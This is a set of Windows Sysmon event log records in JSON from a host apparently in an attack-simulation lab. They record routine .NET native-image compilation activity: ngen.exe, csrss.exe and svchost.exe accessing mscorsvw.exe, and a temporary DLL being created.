{"EventTime":"2020-08-01 08:06:47","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8053,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:06:47.568\r\nSourceProcessGUID: {41C8662E-21BC-5F25-0000-00100BBF0900}\r\nSourceProcessId: 3144\r\nSourceThreadId: 4488\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {41C8662E-2297-5F25-0000-0010AFE70F00}\r\nTargetProcessId: 4492\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x103801\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+91db|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9168|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8fc5|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:06:47.568","SourceProcessGUID":"{41C8662E-21BC-5F25-0000-00100BBF0900}","SourceProcessId":"3144","SourceThreadId":"4488","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{41C8662E-2297-5F25-0000-0010AFE70F00}","TargetProcessId":"4492","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x103801","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+91db|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9168|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8fc5|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:06:49","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:06:47","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8054,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:06:47.568\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-0010E7420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 2336\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {41C8662E-2297-5F25-0000-0010AFE70F00}\r\nTargetProcessId: 4492\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:06:47.568","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-0010E7420000}","SourceProcessId":"648","SourceThreadId":"2336","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{41C8662E-2297-5F25-0000-0010AFE70F00}","TargetProcessId":"4492","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 08:06:49","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:06:47","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8055,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:06:47.568\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-2297-5F25-0000-0010AFE70F00}\r\nTargetProcessId: 4492\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:06:47.568","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-2297-5F25-0000-0010AFE70F00}","TargetProcessId":"4492","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:06:49","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:06:48","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":11,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":11,"OpcodeValue":0,"RecordNumber":8056,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"File created:\r\nRuleName: DLL\r\nUtcTime: 2020-08-01 08:06:48.053\r\nProcessGuid: {41C8662E-2297-5F25-0000-0010AFE70F00}\r\nProcessId: 4492\r\nImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nTargetFilename: C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Temp\\118c-0\\System.ServiceModel.Internals.dll\r\nCreationUtcTime: 2020-08-01 08:06:48.053","Category":"File created (rule: FileCreate)","Opcode":"Info","RuleName":"DLL","UtcTime":"2020-08-01 08:06:48.053","ProcessGuid":"{41C8662E-2297-5F25-0000-0010AFE70F00}","Image":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","TargetFilename":"C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Temp\\118c-0\\System.ServiceModel.Internals.dll","CreationUtcTime":"2020-08-01 08:06:48.053","EventReceivedTime":"2020-08-01 08:06:49","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:06:48","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8057,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:06:48.100\r\nSourceProcessGUID: {41C8662E-21BC-5F25-0000-00100BBF0900}\r\nSourceProcessId: 3144\r\nSourceThreadId: 3780\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {41C8662E-2298-5F25-0000-001047EB0F00}\r\nTargetProcessId: 4208\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x103801\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:06:48.100","SourceProcessGUID":"{41C8662E-21BC-5F25-0000-00100BBF0900}","SourceProcessId":"3144","SourceThreadId":"3780","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{41C8662E-2298-5F25-0000-001047EB0F00}","TargetProcessId":"4208","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x103801","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:06:49","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:06:48","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8058,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:06:48.100\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-0010E7420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 1148\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {41C8662E-2298-5F25-0000-001047EB0F00}\r\nTargetProcessId: 4208\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:06:48.100","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-0010E7420000}","SourceProcessId":"648","SourceThreadId":"1148","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{41C8662E-2298-5F25-0000-001047EB0F00}","TargetProcessId":"4208","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 08:06:49","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:06:48","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8059,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:06:48.100\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-2298-5F25-0000-001047EB0F00}\r\nTargetProcessId: 4208\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:06:48.100","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-2298-5F25-0000-001047EB0F00}","TargetProcessId":"4208","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:06:49","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:06:48","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8060,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:06:48.162\r\nSourceProcessGUID: {41C8662E-21BC-5F25-0000-00100BBF0900}\r\nSourceProcessId: 3144\r\nSourceThreadId: 4488\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {41C8662E-2290-5F25-0000-001053820F00}\r\nTargetProcessId: 5028\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x103801\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+91db|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9168|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8fc5|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:06:48.162","SourceProcessGUID":"{41C8662E-21BC-5F25-0000-00100BBF0900}","SourceProcessId":"3144","SourceThreadId":"4488","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{41C8662E-2290-5F25-0000-001053820F00}","TargetProcessId":"5028","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x103801","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+91db|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9168|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8fc5|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:06:49","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:06:48","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8061,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:06:48.162\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-0010E7420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 2336\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {41C8662E-2290-5F25-0000-001053820F00}\r\nTargetProcessId: 5028\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:06:48.162","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-0010E7420000}","SourceProcessId":"648","SourceThreadId":"2336","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{41C8662E-2290-5F25-0000-001053820F00}","TargetProcessId":"5028","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 08:06:49","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
